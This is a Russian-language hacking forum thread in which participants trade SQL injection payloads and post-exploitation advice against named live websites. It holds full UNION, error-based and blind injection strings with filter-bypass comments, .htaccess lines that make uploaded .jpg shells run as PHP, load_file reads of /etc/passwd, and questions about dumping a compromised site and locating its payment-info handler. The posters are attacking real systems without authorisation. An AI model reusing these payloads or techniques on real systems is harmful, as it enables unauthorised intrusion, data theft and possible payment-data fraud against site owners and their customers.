http://www.cinemaphotos.net/cinemaphotos.php?gid=1446+/*!and*/+1/*!=*/2+uNiOn+/*!select*/+1,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+information_schema.`tables`+--+ как тут обойти фильтрацию юниона? З.Ы. разобрался, короче это из-за разных кодировок.. convert(table_name+using+нужная кодировка) ток в моем случаи хз как узнать нужную...
Там union не фильтруется. нет правна просмотр schema.tables. http://www.cinemaphotos.net/cinemaphotos.php?gid=1446+/*!and*/+1/*!=*/2+uNiOn+/*!select*/+1,unhex(hex(table_name)),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+information_schema.columns+where+column_name+like+0x25696425--+
такой вопрос, заливаю в админке через загрузчик изображений шелл, заливается нормально, только при открытии его http://сайт.ру/userfiles/image/222_20110623183746.php открывается его исходный код, что можно тут пидумать? поможел ли заливка .htaccess? если да то с каким содержимым?
попробуй с таким содержимым Code: AddType application/x-httpd-php .jpg AddHandler application/x-httpd-php .jpg
пишу сканер SQLi подскажите наиболее часто встречающиеся параметры на страницах мой список: Code: id page num name p n нужно найти еще парочку популярных
Самый оптимальный вариант - сканер, который сам ищет на ресурсе параметры. ...результаты по запросу (inurl:"php?параметр=1"): c - 31 900 000 cat - 21 300 000 category - 7 560 000 CatID - 4 850 000 pagina - 3 660 000 PID - 2 180 000 sn - 116 000 catalogid - 12 600
спасибо за подсказку нашел скулю в POST на одном сайте подставил site.ru?id=1" выдает мне такое: Code: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?id=1[COLOR=Red]"[/COLOR]"' at line 3 SQL query : INSERT INTO ips(ip, cnt, last_url) VALUES("***.93.28.***", 1,"/?id=1[COLOR=Red]"[/COLOR]") ON DUPLICATE KEY UPDATE cnt=cnt+1, last_url="/?id=1[COLOR=Red]"[/COLOR]" я еще не пробовал инжектить в Insert или Update где можно почитать посмотреть как это делается?
Есть сайт,на нём у меня шелл,права www-data , прав на запись нет, вопрос, как можно сделать дамп сайта? хееелп ми
,(select+1+from(select+count(*),concat((select+table_name+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
Code: 1'and(1)=(select*from(select*from(information_schema.tables`a`)JOIN(information_schema.tables`b`)using(TABLE_CATALOG,TABLE_SCHEMA))c)='1 1060: Duplicate column name 'Table_Name' Здесь понятно. Спасибо. Мы просто делаем листинг таблиц и столбцов. Собственно вопрос. Нашли таблицу, вывели все имена столбцов. Можно ли использовать этот шаблон с join + using/on для вывода через ошибку дубля (как выше) записей из таблиц? При условии, что пробелы запрещены, limit, order, соответственно, запрещены. А name_const будет работать только на вывод version() (из-за баги - другое не выводит). ExtractValue - в этой ветке 5.0.x отсутствует. Или какие еще есть варианты по выводу в таком случае? Здесь http://www.xakep.ru/post/50554/?print=true и здесь http://forum.antichat.ru/threadnav119047-1-10.html ответов, к сожалению, не нашел ______________________________________________________ Еще вопрос. Вот http://www.efanli.com.cn/article_list.php?cid=1 блинд, как я понимаю, там запрет на обращение к схеме. Через блинд можно вывести пути, юзера, базу и др. НО, как подобраться к таблицам и соответственно, к записям таблиц?
такой вопрос, получил доступ в phpmyadmin хотел скачать etc/passwd ввожу запрос SELECT load_file( '/etc/passwd' ) нормально выдало load_file('/etc/passwd') [BLOB - 1.2 КБ] но содержимое показывать нехочет, чтобы в параметрах невыставил нифига не катит, ни Показать BLOB содержимое ни Развернутое отображение данных, в первы раз такое, как всётаки можно попробовать посмотреть содержимаее файла etc/passwd в таком случае?
чтобы в параметрах невыставил нифига не катит, ни Показать BLOB содержимое ни Развернутое отображение данных
не, никакие насройки в параметрах некатят, а как мне занесли данные в таблицу? попробовал так PHP: insert into `db.a` (`text`) VALUES ('(select load_file('/etc/passwd'))') выдпло ошибку, как правельние?
убери кавычки, у тебя стринг получается, а не выполняющаяся функция ((select load_file('/etc/passwd'))
нет походу просто я неправильно пользуюсь тем примером.Вот я а локалхосте пробую пользоваться,и ввожу как в том примере http://localhost/erase.php?id=-2+union+select+0x2D3220756E696F6E2073656C6563742027393939272C3131312F2A,2,3/* поидее как там пишется должно вывести 2:3 999:111 но выводит -2 union select '999',111/* вот такие дела
Ни как не могу разобраться с rewrite mode. Залил шелл на сайт. При обращении на /store/checkout/payment_info/xxxxxxxx, где xxxxxxxx уникальный ID, выводится определенная инфа. Все перекопал, но не могу найти тот скрипт на шелле, который обрабатывает ID и выводит инфу. Сервак очень большой, с реврайтом очень плохо знаком. Как можно узнать?
